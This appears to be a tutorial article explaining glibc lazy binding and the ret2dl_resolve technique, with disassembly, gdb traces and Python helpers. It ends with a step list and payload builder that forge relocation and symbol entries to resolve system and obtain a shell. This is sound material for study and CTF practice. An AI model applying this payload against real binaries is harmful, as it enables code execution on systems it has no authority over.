In this article, we will first analyze the lazy binding process, then dissect dl-runtime to understand when this technique can be used without a leak, and finally build our exploit.
The Lazy Binding
When a program is executed on Linux, by default the dynamic linker resolves references to symbols in shared libraries only when they are needed. In other words, the program doesn’t know the address of a specific function in a shared library until that function is actually called.
The process of resolving symbols at run time is known as lazy binding.
This behavior can be changed: the dynamic linker can be forced to perform all relocations at program startup by exporting the LD_BIND_NOW environment variable. As we can see in the ld.so man page:
LD_BIND_NOW (since glibc 2.1.1)
If set to a nonempty string, causes the dynamic linker to
resolve all symbols at program startup instead of deferring
function call resolution to the point when they are first
referenced. This is useful when using a debugger.
Two of the most important sections involved in the lazy binding process are the Procedure Linkage Table (PLT) and the Global Offset Table (GOT).
The PLT section contains executable code and consists of stubs with a well-defined format. These stubs can be divided into a default stub and a series of function stubs. As we can see from the objdump output, we have a default stub at 0x401020 followed by a function stub (read() in this case) at 0x401030.
objdump -d poc -j .plt -M intel
Disassembly of section .plt:
0000000000401020 <.plt>:
401020: ff 35 e2 2f 00 00 push QWORD PTR [rip+0x2fe2] # 404008 <_GLOBAL_OFFSET_TABLE_+0x8>
401026: ff 25 e4 2f 00 00 jmp QWORD PTR [rip+0x2fe4] # 404010 <_GLOBAL_OFFSET_TABLE_+0x10>
40102c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
0000000000401030 <read@plt>:
401030: ff 25 e2 2f 00 00 jmp QWORD PTR [rip+0x2fe2] # 404018 <read@GLIBC_2.2.5>
401036: 68 00 00 00 00 push 0x0
40103b: e9 e0 ff ff ff jmp 401020 <.plt>
The GOT is a data section that is populated at run time with the addresses of resolved symbols. It also contains important addresses used in the symbol resolution process: the link_map structure address and the _dl_runtime_resolve address, which we will cover shortly.
objdump -d poc -j .got.plt -M intel -z
Disassembly of section .got.plt:
0000000000404000 <_GLOBAL_OFFSET_TABLE_>:
404000: 20 3e 40 00 00 00 00 00 00 00 00 00 00 00 00 00 >@.............
404010: 00 00 00 00 00 00 00 00 36 10 40 00 00 00 00 00 ........6.@.....
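The addresses that objdump prints in its comments can be re-derived by hand. The following Python sketch (the helper name rip_target is ours, not part of any tool) recomputes the RIP-relative targets of the PLT stubs and decodes the .got.plt bytes shown above.

```python
import struct

def rip_target(insn_addr: int, insn_len: int, disp: int) -> int:
    """Target of a RIP-relative operand: next instruction address + displacement."""
    return insn_addr + insn_len + disp

# Displacements copied from the objdump listing of .plt above.
got_link_map = rip_target(0x401020, 6, 0x2FE2)   # push QWORD PTR [rip+0x2fe2]
got_resolver = rip_target(0x401026, 6, 0x2FE4)   # jmp  QWORD PTR [rip+0x2fe4]
got_read = rip_target(0x401030, 6, 0x2FE2)       # jmp  QWORD PTR [rip+0x2fe2]

# Raw bytes of .got.plt (0x404000..0x40401f), copied from the dump above.
got_bytes = bytes.fromhex(
    "203e400000000000" "0000000000000000"
    "0000000000000000" "3610400000000000"
)
got = struct.unpack("<4Q", got_bytes)

print(hex(got_link_map), hex(got_resolver), hex(got_read))
print([hex(entry) for entry in got])
```

On disk, the second and third entries are still zero (the loader fills in link_map and _dl_runtime_resolve at startup), the first entry holds the address of the dynamic section, and the fourth entry, read()'s slot, points back to 0x401036 inside read@plt.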
Let’s see what happens when read() is called:
- In the .text section, instead of calling read() directly, there is a call to the corresponding function stub in the .plt section (0x401030).
- From here, there is an indirect jump through the .got.plt entry at 0x404018. Since the symbol has not been resolved yet, this entry contains the address of the next instruction in the function stub (0x401036).
- Execution therefore continues at the next instruction in the function stub, where reloc_arg is pushed on the stack.
- The last instruction in the function stub is a direct jump to the default stub (0x401020). Here the link_map address is pushed on the stack and control is finally transferred to _dl_runtime_resolve().
We will talk about reloc_arg and link_map in the next section.
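The control flow above can be mimicked with a toy model. This is only an illustration of the idea (resolve on first call, patch the slot, go direct afterwards); the class and its names are invented for this sketch and have nothing to do with how ld.so is actually implemented.

```python
class LazyGot:
    """Toy model of lazily bound GOT slots."""

    def __init__(self, library):
        self.library = library      # name -> callable, stands in for libc
        self.slots = {}             # one "GOT slot" per symbol name
        self.resolver_calls = 0

    def _resolve(self, name):
        # Plays the role of _dl_runtime_resolve()/_dl_fixup(): look the symbol
        # up once and patch the slot with the real target.
        self.resolver_calls += 1
        self.slots[name] = self.library[name]
        return self.slots[name]

    def call(self, name, *args):
        # Plays the role of the PLT stub: jump through the slot; an unpatched
        # slot falls through to the resolver.
        target = self.slots.get(name) or self._resolve(name)
        return target(*args)

got = LazyGot({"strlen": len})
first = got.call("strlen", "lazy")       # goes through the resolver
second = got.call("strlen", "binding")   # uses the patched slot
print(first, second, got.resolver_calls)
```

The resolver runs only for the first call; the second call finds the slot already patched, which is exactly what happens to the .got.plt entry of read().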
_dl_runtime_resolve() is defined in dl-trampoline.S and its definition is followed by the inclusion of dl-trampoline.h.
Using gdb, we can immediately understand what it does:
0x7ffff7fe93c0 <_dl_runtime_resolve_xsave>: push rbx
0x7ffff7fe93c1 <_dl_runtime_resolve_xsave+1>: mov rbx,rsp
0x7ffff7fe93c4 <_dl_runtime_resolve_xsave+4>: and rsp,0xffffffffffffffc0
0x7ffff7fe93c8 <_dl_runtime_resolve_xsave+8>: sub rsp,QWORD PTR [rip+0x13379] // 0x7ffff7ffc748 <_rtld_global_ro+232>
0x7ffff7fe93cf <_dl_runtime_resolve_xsave+15>: mov QWORD PTR [rsp],rax
0x7ffff7fe93d3 <_dl_runtime_resolve_xsave+19>: mov QWORD PTR [rsp+0x8],rcx
0x7ffff7fe93d8 <_dl_runtime_resolve_xsave+24>: mov QWORD PTR [rsp+0x10],rdx
0x7ffff7fe93dd <_dl_runtime_resolve_xsave+29>: mov QWORD PTR [rsp+0x18],rsi
0x7ffff7fe93e2 <_dl_runtime_resolve_xsave+34>: mov QWORD PTR [rsp+0x20],rdi
0x7ffff7fe93e7 <_dl_runtime_resolve_xsave+39>: mov QWORD PTR [rsp+0x28],r8
0x7ffff7fe93ec <_dl_runtime_resolve_xsave+44>: mov QWORD PTR [rsp+0x30],r9
0x7ffff7fe93f1 <_dl_runtime_resolve_xsave+49>: mov eax,0xee
0x7ffff7fe93f6 <_dl_runtime_resolve_xsave+54>: xor edx,edx
0x7ffff7fe93f8 <_dl_runtime_resolve_xsave+56>: mov QWORD PTR [rsp+0x240],rdx
0x7ffff7fe9400 <_dl_runtime_resolve_xsave+64>: mov QWORD PTR [rsp+0x248],rdx
0x7ffff7fe9408 <_dl_runtime_resolve_xsave+72>: mov QWORD PTR [rsp+0x250],rdx
0x7ffff7fe9410 <_dl_runtime_resolve_xsave+80>: mov QWORD PTR [rsp+0x258],rdx
0x7ffff7fe9418 <_dl_runtime_resolve_xsave+88>: mov QWORD PTR [rsp+0x260],rdx
0x7ffff7fe9420 <_dl_runtime_resolve_xsave+96>: mov QWORD PTR [rsp+0x268],rdx
0x7ffff7fe9428 <_dl_runtime_resolve_xsave+104>: mov QWORD PTR [rsp+0x270],rdx
0x7ffff7fe9430 <_dl_runtime_resolve_xsave+112>: mov QWORD PTR [rsp+0x278],rdx
0x7ffff7fe9438 <_dl_runtime_resolve_xsave+120>: xsave [rsp+0x40] // Save current processor state
0x7ffff7fe943d <_dl_runtime_resolve_xsave+125>: mov rsi,QWORD PTR [rbx+0x10] // reloc_arg
0x7ffff7fe9441 <_dl_runtime_resolve_xsave+129>: mov rdi,QWORD PTR [rbx+0x8] // link_map
0x7ffff7fe9445 <_dl_runtime_resolve_xsave+133>: call 0x7ffff7fe2a20 <_dl_fixup> // _dl_fixup(link_map, reloc_arg)
As we can see, it is nothing more than a trampoline to _dl_fixup(). It starts by saving the current processor state, then moves reloc_arg into RSI and link_map into RDI (following the x86_64 Linux calling convention defined by the AMD64 ABI) and calls _dl_fixup().
PS: The second instruction copies RSP into RBX, so that, right before the call to _dl_fixup(), QWORD PTR [rbx+0x10] and QWORD PTR [rbx+0x8] refer respectively to reloc_arg and link_map, previously pushed on the stack.
Dissecting dl-runtime
Before starting our analysis, we need to introduce three more important sections: JMPREL (.rela.plt), DYNSYM (.dynsym) and STRTAB (.dynstr). (PS: .dynsym is analogous to .symtab, but it contains information about dynamic linking rather than static linking. The same applies to .dynstr and .strtab.)
readelf --sections ./poc | egrep "Name|.rela.plt|.dynsym|.dynstr"
[Nr] Name Type Address Offset
[ 5] .dynsym DYNSYM 0000000000400328 00000328
[ 6] .dynstr STRTAB 0000000000400388 00000388
[10] .rela.plt RELA 0000000000400420 00000420
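JMPREL (.rela.plt): It contains information used by the linker to perform relocations. It is composed of 0x18-byte entries. Strictly speaking these are Elf64_Rela structures (an Elf64_Rel plus an r_addend field); for brevity we refer to them as Elf64_Rel.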
- r_offset: It contains the location where the address of the resolved symbol will be stored (In the GOT).
- r_info: Indicates the relocation type and acts as a symbol table index. It will be used to locate the corresponding Elf64_Sym structure in the DYNSYM section.
DYNSYM (.dynsym): It contains a symbol table. It is composed of 0x18-byte Elf64_Sym structures. Each structure associates a symbolic name with a piece of code elsewhere in the binary.
- st_name: It acts as a string table index. It will be used to locate the right string in the STRTAB section.
- st_info: It contains the symbol’s type and binding attributes.
- st_other: It contains the symbol’s visibility.
- st_shndx: It contains the relevant section header table index.
- st_value: It contains the value of the associated symbol.
- st_size: It contains the symbol’s size. If the symbol has no size or the size is unknown, it contains 0.
STRTAB (.dynstr): The strings containing the symbolic names are located here.
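To make the layouts concrete, here is a small ctypes sketch of the two record types. The field lists follow the standard <elf.h> definitions; the relocation record is the Elf64_Rela variant, which is what a .rela.plt section contains on x86_64. The sketch only checks sizes and offsets, it does not parse a real binary.

```python
import ctypes

class Elf64_Rela(ctypes.Structure):
    _fields_ = [
        ("r_offset", ctypes.c_uint64),   # where the resolved address is stored
        ("r_info", ctypes.c_uint64),     # symbol index (high 32) | type (low 32)
        ("r_addend", ctypes.c_int64),    # unused for JUMP_SLOT relocations
    ]

class Elf64_Sym(ctypes.Structure):
    _fields_ = [
        ("st_name", ctypes.c_uint32),    # offset into the string table
        ("st_info", ctypes.c_uint8),     # type and binding
        ("st_other", ctypes.c_uint8),    # visibility
        ("st_shndx", ctypes.c_uint16),   # section header table index
        ("st_value", ctypes.c_uint64),   # symbol value
        ("st_size", ctypes.c_uint64),    # symbol size
    ]

rela_size = ctypes.sizeof(Elf64_Rela)
sym_size = ctypes.sizeof(Elf64_Sym)
print(hex(rela_size), hex(sym_size))
print(Elf64_Sym.st_other.offset, Elf64_Sym.st_value.offset)
```

Both records are 0x18 bytes long, which is why the same stride appears in every index computation later on.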
Now we can start our analysis. _dl_fixup() is defined in dl-runtime.c as follows:
We can see at line 8 that the function accepts two arguments:
struct link_map *l, ElfW(Word) reloc_arg
These are the arguments that were previously pushed on the stack and then moved into RDI and RSI respectively.
link_map is an important structure that contains all sorts of information about a loaded shared object. The linker creates a linked list of link_maps, and each link_map structure describes a shared object.
reloc_arg will be used as an index to identify the corresponding Elf64_Rel in the JMPREL section.
At line 10, a pointer to the STRTAB section is defined:
const char *strtab = (const void *) D_PTR(l, l_info[DT_STRTAB]);
l_info (located at &link_map + 0x40; its entries point into the dynamic section) is indexed by a tag, in this case DT_STRTAB, defined as #define DT_STRTAB 5, and the selected element is passed as the second argument to the D_PTR macro.
D_PTR is defined as
D_PTR(map, i) ((map)->i->d_un.d_ptr + (map)->l_addr)
if the dynamic section is read only, and as
D_PTR(map, i) (map)->i->d_un.d_ptr
otherwise.
It is used to find the d_ptr value in the corresponding Elf64_Dyn structure in the DYNAMIC section (which acts as a sort of “road map” for the dynamic linker).
An Elf64_Dyn structure is defined as follows:
typedef struct{
Elf64_Sxword d_tag; /* Dynamic entry type */
union
{
Elf64_Xword d_val; /* Integer value */
Elf64_Addr d_ptr; /* Address value */
} d_un;
} Elf64_Dyn;
All this results in l->l_info[5]->d_un.d_ptr, the STRTAB address, 0x400388 in our case.
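The lookup can be modelled in a few lines of Python. This is a simplified sketch: the real l_info is a fixed-size array of pointers inside link_map, while here it is a dict; the contents and order of the dynamic section below are invented for illustration (only the section addresses come from poc); and only the branch of D_PTR that does not add l_addr is modelled.

```python
import struct

DT_NULL, DT_STRTAB, DT_SYMTAB, DT_JMPREL = 0, 5, 6, 23
DYN_SIZE = 16   # sizeof(Elf64_Dyn): 8-byte d_tag + 8-byte d_un

def build_l_info(dynamic: bytes, dynamic_addr: int) -> dict:
    """Map each d_tag to the address of its Elf64_Dyn entry, as l_info does."""
    l_info = {}
    for off in range(0, len(dynamic), DYN_SIZE):
        d_tag, _ = struct.unpack_from("<qQ", dynamic, off)
        if d_tag == DT_NULL:
            break
        l_info[d_tag] = dynamic_addr + off
    return l_info

def d_ptr(dynamic: bytes, dynamic_addr: int, entry_addr: int) -> int:
    """Read d_un.d_ptr from the Elf64_Dyn entry located at entry_addr."""
    _, value = struct.unpack_from("<qQ", dynamic, entry_addr - dynamic_addr)
    return value

# Hypothetical dynamic section reusing the section addresses of poc.
DYNAMIC_ADDR = 0x403E20
dynamic = b"".join(struct.pack("<qQ", tag, val) for tag, val in [
    (DT_STRTAB, 0x400388), (DT_SYMTAB, 0x400328), (DT_JMPREL, 0x400420), (DT_NULL, 0),
])

l_info = build_l_info(dynamic, DYNAMIC_ADDR)
strtab = d_ptr(dynamic, DYNAMIC_ADDR, l_info[DT_STRTAB])
print(hex(strtab))
```

The important detail is the double indirection: l_info[tag] yields a pointer to an Elf64_Dyn entry, and only d_un.d_ptr inside that entry is the section address.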
At line 11, a pointer to an Elf64_Rel structure is defined:
const PLTREL *const reloc = (const void *) (D_PTR(l, l_info[DT_JMPREL]) + reloc_offset);
Similarly to the previous line, l_info and D_PTR are used to obtain the JMPREL section address, but here reloc_offset is added. It corresponds to reloc_arg * sizeof(PLTREL), that is, reloc_arg * 0x18.
Note the total absence of an upper-bound check on reloc_arg. Later on, this will allow us to perform the ret2dl_resolve attack by providing a large reloc_arg to _dl_fixup().
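The pointer arithmetic is simple enough to reproduce directly. In this sketch JMPREL is the .rela.plt address from the readelf output above, while 0x404710 is just an assumed writable address chosen so that it sits a multiple of 0x18 bytes past JMPREL.

```python
JMPREL = 0x400420        # .rela.plt address from the readelf output
SIZEOF_PLTREL = 0x18     # size of one relocation entry

def reloc_address(reloc_arg: int) -> int:
    """Address _dl_fixup() reads the relocation entry from (no bounds check)."""
    return JMPREL + reloc_arg * SIZEOF_PLTREL

def reloc_arg_for(target: int) -> int:
    """reloc_arg that makes _dl_fixup() read its entry at `target`."""
    offset = target - JMPREL
    if offset % SIZEOF_PLTREL:
        raise ValueError("target must be JMPREL + k * 0x18")
    return offset // SIZEOF_PLTREL

legit = reloc_address(0)              # entry of read(), the only PLT function
fake_arg = reloc_arg_for(0x404710)    # hypothetical address inside .bss
print(hex(legit), fake_arg, hex(reloc_address(fake_arg)))
```

Because the index is multiplied by 0x18, the fake entry cannot live at an arbitrary address: it has to be aligned relative to JMPREL, which is what reloc_arg_for() enforces.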
At line 12, a pointer to an Elf64_Sym structure is defined:
const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)];
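To better understand this line, we need to follow some definitions. ELFW(type) is the upper-case counterpart of ElfW(type), which is defined as:
#define ElfW(type) _ElfW (Elf, __ELF_NATIVE_CLASS, type)
#define _ElfW(e,w,t) _ElfW_1 (e, w, _##t)
#define _ElfW_1(e,w,t) e##w##t
ELFW(type) reuses the same helpers with an upper-case prefix:
#define ELFW(type) _ElfW (ELF, __ELF_NATIVE_CLASS, type)
This means that:
ELFW(R_SYM) =
_ElfW(ELF, __ELF_NATIVE_CLASS, R_SYM) =
_ElfW_1(ELF, 64, _R_SYM) =
ELF64_R_SYM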
and ELF64_R_SYM(i) is defined as ELF64_R_SYM(i) ((i) >> 32), so we can read line 12 as:
const ElfW(Sym) *sym = &symtab[reloc->r_info >> 32];
Basically, it uses reloc->r_info >> 32 as an index to find the corresponding Elf64_Sym structure in the SYMTAB section.
At line 14, we have:
void *const rel_addr = (void *)(l->l_addr + reloc->r_offset);
rel_addr is a pointer to the location where the resolved symbol will be stored (in the GOT).
At line 20, there’s an important check:
assert (ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT);
ELF64_R_TYPE is defined as ELF64_R_TYPE(i) ((i) & 0xffffffff) and ELF_MACHINE_JMP_SLOT is defined as R_X86_64_JUMP_SLOT, which is equal to 7.
So line 20 is nothing more than:
assert ((reloc->r_info & 0xffffffff) == 0x7);
Basically, it checks that reloc->r_info describes a valid JUMP_SLOT relocation.
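The two halves of r_info can be split and rebuilt with plain shifts and masks. The helper names below mirror the glibc macros but are our own Python functions, and the symbol index 1 is only an assumed example value.

```python
R_X86_64_JUMP_SLOT = 7

def r_sym(r_info: int) -> int:
    """Equivalent of ELF64_R_SYM: symbol table index in the upper 32 bits."""
    return r_info >> 32

def r_type(r_info: int) -> int:
    """Equivalent of ELF64_R_TYPE: relocation type in the lower 32 bits."""
    return r_info & 0xFFFFFFFF

def make_r_info(sym_index: int, rel_type: int = R_X86_64_JUMP_SLOT) -> int:
    """Inverse operation, handy when forging a relocation entry."""
    return (sym_index << 32) | rel_type

info = make_r_info(1)   # assumed example: symbol index 1
print(hex(info), r_sym(info), r_type(info) == R_X86_64_JUMP_SLOT)
```

Any forged r_info built with make_r_info() passes the assert at line 20 by construction, whatever the symbol index is.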
At line 24, there’s another check:
if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0)
ELF64_ST_VISIBILITY corresponds to ELF32_ST_VISIBILITY(o) ((o) & 0x03), so line 24 is equal to:
if (__builtin_expect ((sym->st_other & 0x03), 0) == 0)
If the check is not satisfied, the symbol is considered already resolved; otherwise the code inside the “if” statement is executed. It starts with a symbol versioning check at line 28:
if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
VERSYMIDX is defined as:
#define VERSYMIDX(sym) (DT_NUM + DT_THISPROCNUM + DT_VERSIONTAGIDX(sym))
DT_VERSYM, DT_NUM, DT_THISPROCNUM, DT_VERNEEDNUM and DT_VERSIONTAGIDX correspond to:
#define DT_VERSYM 0x6ffffff0
#define DT_NUM 35 /* Number used */
#define DT_THISPROCNUM 0
#define DT_VERNEEDNUM 0x6fffffff /* Number of needed versions */
#define DT_VERSIONTAGIDX(tag) (DT_VERNEEDNUM - (tag)) /* Reverse order! */
So VERSYMIDX(DT_VERSYM) is equal to:
VERSYMIDX(0x6ffffff0) =
(DT_NUM + DT_THISPROCNUM + DT_VERSIONTAGIDX(0x6ffffff0)) =
(35 + 0 + DT_VERSIONTAGIDX(0x6ffffff0)) =
(35 + (0x6fffffff - 0x6ffffff0)) =
(35 + 0xf) = 0x32
Consequently we have:
&l (link_map address) + 0x40 (l_info off) + VERSYMIDX(0x6ffffff0) * 0x8 (address size) =
&l + 0x40 + 0x32 * 0x8 =
&l + 0x1d0
Therefore, the check is satisfied if the pointer stored at &l + 0x1d0 is not NULL, which is usually the case. For example, in our case:
0x7ffff7fe2a81 <_dl_fixup+97>: mov r8,QWORD PTR [r10+0x1d0]
0x7ffff7fe2a88 <_dl_fixup+104>: test r8,r8
where R10 contains the link_map address and QWORD PTR [r10+0x1d0], moved into R8, is the address of the VERSYM entry in the DYNAMIC section:
R8 0x403f80 (_DYNAMIC+352) <-- 0x6ffffff0
so the code in the “if” statement is executed:
const ElfW(Half) *vernum = (const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
version = &l->l_versions[ndx];
if (version->hash == 0)
version = NULL;
It obtains the VERSYM address using the usual l_info and D_PTR macro, then calculates “ndx” using reloc->r_info >> 32 as an index into the VERSYM section. “ndx” is subsequently used as an index into l_versions (located at &link_map + 0x2e8, an array with version names) to obtain the version name.
Keep this point in mind; we will analyze it in gdb in the next section.
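The index arithmetic of the versioning check can be replayed in Python. The constants are the ones quoted above; they, and the 0x40 offset of l_info, belong to the glibc build analyzed in this article and may differ in other versions. The sample value 0x8002 passed to version_index() is an invented VERSYM entry.

```python
DT_NUM = 35
DT_THISPROCNUM = 0
DT_VERNEEDNUM = 0x6FFFFFFF
DT_VERSYM = 0x6FFFFFF0

L_INFO_OFFSET = 0x40   # offset of l_info inside struct link_map (from the text)
POINTER_SIZE = 8

def versymidx(tag: int) -> int:
    """VERSYMIDX(tag): slot in l_info used for the version-related tags."""
    return DT_NUM + DT_THISPROCNUM + (DT_VERNEEDNUM - tag)

def versym_slot_offset() -> int:
    """Offset of l_info[VERSYMIDX(DT_VERSYM)] from the start of link_map."""
    return L_INFO_OFFSET + versymidx(DT_VERSYM) * POINTER_SIZE

def version_index(versym_entry: int) -> int:
    """ndx as computed by _dl_fixup(): the top bit of the entry is masked off."""
    return versym_entry & 0x7FFF

print(hex(versymidx(DT_VERSYM)), hex(versym_slot_offset()), version_index(0x8002))
```

The value returned by versym_slot_offset() is the offset a NULL pointer must be written to if one wants to bypass the versioning block entirely.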
Finally, at line 48, _dl_lookup_symbol_x() is called, followed by DL_FIXUP_MAKE_VALUE at line 62 and elf_machine_fixup_plt() at line 82:
result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope,
version, ELF_RTYPE_CLASS_PLT, flags, NULL);
_dl_lookup_symbol_x() searches the loaded objects’ symbol tables for a definition of the symbol named by strtab + sym->st_name.
It returns the address of the link_map structure of the object that defines the symbol (libc, in our case); l_addr, the first element of that structure, holds the libc base address.
value = DL_FIXUP_MAKE_VALUE (result, SYMBOL_ADDRESS (result, sym, false));
[...]
return elf_machine_fixup_plt (l, result, refsym, sym, reloc, rel_addr, value);
DL_FIXUP_MAKE_VALUE takes the offset of the function in the library, relocates it and stores the result in the value variable. To do this, it uses the SYMBOL_ADDRESS macro, defined as:
#define SYMBOL_ADDRESS(map, ref, map_set) \
((ref) == NULL ? 0 \
: (__glibc_unlikely ((ref)->st_shndx == SHN_ABS) ? 0 \
: LOOKUP_VALUE_ADDRESS (map, map_set)) + (ref)->st_value)
Where LOOKUP_VALUE_ADDRESS corresponds to:
#define LOOKUP_VALUE_ADDRESS(map, set) ((set) || (map) ? (map)->l_addr : 0)
If everything goes well, it will result in:
value = DL_FIXUP_MAKE_VALUE (result, result->l_addr + sym->st_value);
We can see it in gdb, a couple of instructions after the _dl_lookup_symbol_x() call:
0x7ffff7fe2b1c <_dl_fixup+252> mov rax, QWORD PTR [r8]
0x7ffff7fe2b1f <_dl_fixup+255> add rax, QWORD PTR [rdx + 8]
In the first instruction, R8 contains the link_map address returned by the lookup, and its first field, l_addr, holds the libc base address:
R8 0x7ffff7fae000 --> 0x7ffff7deb000 <-- 0x3010102464c457f
In the second instruction, RDX points to the corresponding Elf64_Sym structure in libc, found by _dl_lookup_symbol_x():
RDX 0x7ffff7df7cd0 <-- 0xe001200002049
So it moves the libc base address into RAX, and then adds to it the value stored at RDX + 0x8.
$rdx + 0x8 = 0x7ffff7df7cd0 + 0x8 = 0x7ffff7df7cd8
which is the location of the st_value field in the Elf64_Sym structure:
0x7ffff7df7cd8: 0x00000000000ee550
So we have:
rax + QWORD PTR [rdx + 8] = libc base address + st_value = 0x7ffff7deb000 + 0xee550 = 0x7ffff7ed9550,
the location of the read() function in libc!
Now that the relocation is complete, elf_machine_fixup_plt() writes the address of the resolved symbol to the location pointed to by rel_addr (in the GOT).
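As a cross-check of the gdb session, the values shown in RDX and R8 can be decoded with struct. The sketch below unpacks the first quadword of the Elf64_Sym found in libc and repeats the final addition; all numbers are copied from the output above.

```python
import struct

# First 8 bytes of the Elf64_Sym located by _dl_lookup_symbol_x() (value at RDX).
head = struct.pack("<Q", 0x000E001200002049)
st_name, st_info, st_other, st_shndx = struct.unpack("<IBBH", head)

# ELF64_ST_BIND and ELF64_ST_TYPE split st_info into two nibbles.
st_bind, st_type = st_info >> 4, st_info & 0xF

l_addr = 0x7FFFF7DEB000   # libc base address, read through R8
st_value = 0xEE550        # quadword stored at RDX + 8

resolved = l_addr + st_value
print(hex(st_name), st_bind, st_type, st_other, hex(resolved))
```

The binding value 1 is STB_GLOBAL and the type value 2 is STT_FUNC, and st_other is 0, so the symbol found in libc is an ordinary global function with default visibility.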
Let’s do a quick recap:
- _dl_fixup(link_map, reloc_arg) is called.
- const PLTREL *const reloc = (const void *) (JMPREL + reloc_offset);
  Based on the value of reloc_offset (reloc_arg * 0x18), _dl_fixup() locates the corresponding Elf64_Rel structure in .rela.plt.
- const ElfW(Sym) *sym = &symtab[reloc->r_info >> 32];
  It uses reloc->r_info >> 32, taken from the Elf64_Rel structure, as an index to find the corresponding Elf64_Sym structure in the SYMTAB section.
- assert ((reloc->r_info & 0xffffffff) == 0x7);
  Using r_info in the Elf64_Rel structure, it ensures the relocation is a valid JUMP_SLOT.
- if (__builtin_expect ((sym->st_other & 0x03), 0) == 0)
  Using st_other in the Elf64_Sym structure, it ensures the symbol is not already resolved. (sym->st_other & 3) != 0 means “symbol already resolved”, so we need st_other == 0.
- if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
  It performs a symbol versioning check. Usually, this check is satisfied, so it computes “ndx” with ElfW(Half) ndx = vernum[reloc->r_info >> 32] & 0x7fff; and then obtains the version with version = &l->l_versions[ndx];.
- result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope, version, ELF_RTYPE_CLASS_PLT, flags, NULL);
  _dl_lookup_symbol_x() searches the loaded objects’ symbol tables for a definition of the symbol named by strtab + sym->st_name and returns the link_map address of the defining object, whose l_addr holds the libc base address.
- value = DL_FIXUP_MAKE_VALUE (result, result->l_addr + sym->st_value);
  DL_FIXUP_MAKE_VALUE() takes the offset of the function from the library base address and relocates it.
- return elf_machine_fixup_plt (l, result, refsym, sym, reloc, rel_addr, value);
  elf_machine_fixup_plt() writes the address of the resolved symbol to the location pointed to by rel_addr (in the GOT).
Headache aside, we can move on to the exploitation part.
The Exploit
Now that we know how dl-runtime.c works, writing an exploit is relatively easy. We can:
- Push a large fake reloc_arg on the stack and then jump to the default PLT stub. _dl_fixup() will be called with link_map and the fake reloc_arg as arguments. This way we can make
  const PLTREL *const reloc = (const void *) (D_PTR(l, l_info[DT_JMPREL]) + reloc_offset);
  point to a controllable area (bss/heap).
- In the fake JMPREL section, we create a fake Elf64_Rel structure with a large fake r_info field. Now we can make
  const ElfW(Sym) *sym = &symtab[reloc->r_info >> 32]
  point to the controllable area too.
- When creating the fake r_info field, we need to make sure that its lower 32 bits are equal to 0x7, so that the valid jump slot check, assert ((reloc->r_info & 0xffffffff) == 0x7);, is satisfied.
- In the fake DYNSYM section, we create a fake Elf64_Sym structure with a fake st_other field set to 0x00. This way the if (__builtin_expect ((sym->st_other & 0x03), 0) == 0) check is satisfied.
- In the same Elf64_Sym structure we create a large fake st_name field. This way we can make strtab + sym->st_name point to the controllable area.
- Finally, in the fake STRTAB section, we write a null-terminated string, for example system\x00. If we did the math correctly, _dl_fixup() will resolve the symbol and we will get a shell!
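The steps above can be sketched as a small payload builder. This is a minimal illustration under stated assumptions, not the exploit used in this article: the table addresses come from the readelf output of poc, the area address 0x404700 and the r_offset target 0x404018 (the GOT slot of read()) are example choices, st_info = 0x12 simply copies the GLOBAL/FUNC attributes seen on the real symbol, and the function names are ours. It only computes bytes and indexes; delivering them (overflow, pivot, ROP chain) is out of scope here.

```python
import struct

JMPREL, SYMTAB, STRTAB = 0x400420, 0x400328, 0x400388   # from readelf above
ENTRY = 0x18                                            # entry size of both tables
R_X86_64_JUMP_SLOT = 7

def align_to_table(addr: int, table: int) -> int:
    """Smallest address >= addr of the form table + k * 0x18."""
    return table + -(-(addr - table) // ENTRY) * ENTRY

def build_fake_tables(area: int, got_slot: int, name: bytes):
    """Lay out a fake relocation, symbol and name string starting near `area`."""
    rela_addr = align_to_table(area, JMPREL)
    sym_addr = align_to_table(rela_addr + ENTRY, SYMTAB)
    str_addr = sym_addr + ENTRY

    reloc_arg = (rela_addr - JMPREL) // ENTRY
    sym_index = (sym_addr - SYMTAB) // ENTRY
    r_info = (sym_index << 32) | R_X86_64_JUMP_SLOT

    # r_offset, r_info, r_addend
    rela = struct.pack("<QQq", got_slot, r_info, 0)
    # st_name, st_info, st_other (must be 0), st_shndx, st_value, st_size
    sym = struct.pack("<IBBHQQ", str_addr - STRTAB, 0x12, 0, 0, 0, 0)

    # The blob is meant to be written at rela_addr, not at `area`.
    blob = rela.ljust(sym_addr - rela_addr, b"\0") + sym + name + b"\0"
    return reloc_arg, rela_addr, blob

reloc_arg, start, blob = build_fake_tables(0x404700, 0x404018, b"system")
print(reloc_arg, hex(start), len(blob))
```

Both fake records have to be aligned relative to their real tables, which is why the blob does not start exactly at the chosen area and why a few padding bytes separate the relocation from the symbol.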
A problem with the x64 architecture arises from:
if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
{
const ElfW(Half) *vernum = (const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
version = &l->l_versions[ndx];
if (version->hash == 0)
version = NULL;
}
Let’s assume that the .bss is mapped at 0x601000 and we decide to use 0x601a00 as the starting address of our controllable area.
When we fake the JMPREL section in this area, we need to compute the r_info field of the corresponding fake Elf64_Rel structure. Its upper 32 bits hold the distance between our fake .dynsym entry and the real SYMTAB, divided by 0x18 (since it is used as an index to identify the corresponding Elf64_Sym structure, and each structure is 0x18 bytes long), while its lower 32 bits hold the relocation type:
(((fake_dynsym - SYMTAB) / 0x18) << 32) | 0x7
In our case:
(((0x601a68 - 0x4002b8) / 0x18) << 32) | 0x7 = 0x1565200000007
The line
ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
becomes
ElfW(Half) ndx = vernum[0x1565200000007 >> 32] & 0x7fff;
The problem is that 0x1565200000007 >> 32 = 0x15652, which is a very large index.
Let’s look at it in gdb:
